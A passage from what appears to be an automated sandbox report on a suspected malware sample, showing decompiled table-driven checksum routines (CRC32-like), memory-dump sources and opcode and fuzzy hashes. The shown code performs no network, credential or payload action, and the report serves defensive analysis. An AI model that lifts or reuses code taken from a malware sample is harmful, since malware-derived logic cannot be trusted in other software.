*_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x18) * 4) ^  *(0x41c2b0 + (_t232 & 0x000000ff) * 4) ^  *(_t103 - 4);
						_t89 =  &(_t103[1]);
						_t241 =  *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4);
						_t266 = _t266 - 0x20;
						_t208 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (( *(0x41cab0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (_t190 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t190 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t190 >> 0x18) * 4) ^  *(0x41c2b0 + (_t190 & 0x000000ff) * 4) ^  *(_t89 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t241 >> 0x18) * 4) ^  *(0x41c2b0 + (_t241 & 0x000000ff) * 4) ^  *_t89) >> 0x18) * 4) ^  *(0x41c2b0 + (_t199 & 0x000000ff) * 4);
						_t264 = _t264 - 1;
					} while (_t264 != 0);
				}
				if(_t266 >= 4) {
					_t164 = _t266 >> 2;
					do {
						_t212 = _t208 ^ _t89[1];
						_t89 =  &(_t89[1]);
						_t266 = _t266 - 4;
						_t164 = _t164 - 1;
						_t208 =  *(0x41cab0 + (_t212 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (_t212 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t212 >> 0x18) * 4) ^  *(0x41c2b0 + (_t212 & 0x000000ff) * 4);
					} while (_t164 != 0);
				}
				_t90 =  &(_t89[1]);
				if(_t266 != 0) {
					do {
						_t208 = _t208 << 0x00000008 ^  *(0x41c2b0 + (_t208 >> 0x00000018 ^  *_t90 & 0x000000ff) * 4);
						_t90 =  &(_t90[1]);
						_t266 = _t266 - 1;
					} while (_t266 != 0);
				}
				return (( !_t208 & 0x0000ff00) + ( !_t208 << 0x10) << 8) + ( !_t208 >> 0x00000008 & 0x0000ff00) + (_t209 >> 0x18);
			}
















                                                                                                                                                                      0x00402b90
                                                                                                                                                                      0x00402b91
                                                                                                                                                                      0x00402bb8
                                                                                                                                                                      0x00402bbc
                                                                                                                                                                      0x00402bc0
                                                                                                                                                                      0x00402bd2
                                                                                                                                                                      0x00402bd9
                                                                                                                                                                      0x00402bda
                                                                                                                                                                      0x00402bdd
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00402bdd
                                                                                                                                                                      0x00402bc0
                                                                                                                                                                      0x00402bdf
                                                                                                                                                                      0x00402be0
                                                                                                                                                                      0x00402be6
                                                                                                                                                                      0x00402bee
                                                                                                                                                                      0x00402bf1
                                                                                                                                                                      0x00402bf1
                                                                                                                                                                      0x00402c34
                                                                                                                                                                      0x00402c37
                                                                                                                                                                      0x00402c79
                                                                                                                                                                      0x00402c7c
                                                                                                                                                                      0x00402cbf
                                                                                                                                                                      0x00402cc2
                                                                                                                                                                      0x00402cc5
                                                                                                                                                                      0x00402d45
                                                                                                                                                                      0x00402d85
                                                                                                                                                                      0x00402d88
                                                                                                                                                                      0x00402d8b
                                                                                                                                                                      0x00402e03
                                                                                                                                                                      0x00402e0a
                                                                                                                                                                      0x00402e0a
                                                                                                                                                                      0x00402bf1
                                                                                                                                                                      0x00402e16
                                                                                                                                                                      0x00402e1a
                                                                                                                                                                      0x00402e20
                                                                                                                                                                      0x00402e20
                                                                                                                                                                      0x00402e23
                                                                                                                                                                      0x00402e63
                                                                                                                                                                      0x00402e66
                                                                                                                                                                      0x00402e69
                                                                                                                                                                      0x00402e69
                                                                                                                                                                      0x00402e20
                                                                                                                                                                      0x00402e6d
                                                                                                                                                                      0x00402e73
                                                                                                                                                                      0x00402e75
                                                                                                                                                                      0x00402e82
                                                                                                                                                                      0x00402e89
                                                                                                                                                                      0x00402e8a
                                                                                                                                                                      0x00402e8a
                                                                                                                                                                      0x00402e75
                                                                                                                                                                      0x00402eb6

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                      • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                                                      • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                      • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02412DF7 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                      • Instruction ID: de6ad1d0c8a1a2648f94f8e477fc437d90fe01e360518356ebc6cba4cd36e3e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                      • Instruction Fuzzy Hash: E3716172A919534BE39CCF5CECD17763713DBC5351F09C27ACA024B6AACA386522C688
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004028B0 Relevance: .2, Instructions: 184COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004028B0(signed int __eax, signed char __ecx, unsigned int __edx) {
				signed int _t87;
				signed int _t90;
				signed int _t119;
				signed char _t175;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				unsigned int _t188;
				unsigned int _t238;
				unsigned int _t239;

				_t175 = __ecx;
				_t239 = __edx;
				_t87 =  !__eax;
				if(__edx != 0) {
					while((_t175 & 0x00000003) != 0) {
						_t87 = _t87 >> 0x00000008 ^  *(0x41b2b0 + (( *_t175 & 0x000000ff ^ _t87) & 0x000000ff) * 4);
						_t175 = _t175 + 1;
						_t239 = _t239 - 1;
						if(_t239 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				if(_t239 >= 0x20) {
					_t238 = _t239 >> 5;
					do {
						_t92 = _t87 ^  *_t175;
						_t177 = _t175 + 8;
						_t196 =  *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4);
						_t179 = _t177 + 8;
						_t101 =  *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8);
						_t181 = _t179 + 8;
						_t214 =  *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + (( *(0x41b6b0 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41bab0 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t92 >> 0x18) * 4) ^  *(0x41beb0 + (_t92 & 0x000000ff) * 4) ^  *(_t177 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t196 >> 0x18) * 4) ^  *(0x41beb0 + (_t196 & 0x000000ff) * 4) ^  *(_t179 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (_t101 >> 0x18) * 4) ^  *(0x41beb0 + (_t101 & 0x000000ff) * 4) ^  *(_t181 - 0xc)) >> 0x18) * 4) ^  *(0x41beb0 + (_t205 & 0x000000ff) * 4) ^  *(_t181 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41b2b0 + (( *(0x41b6b0 + (( 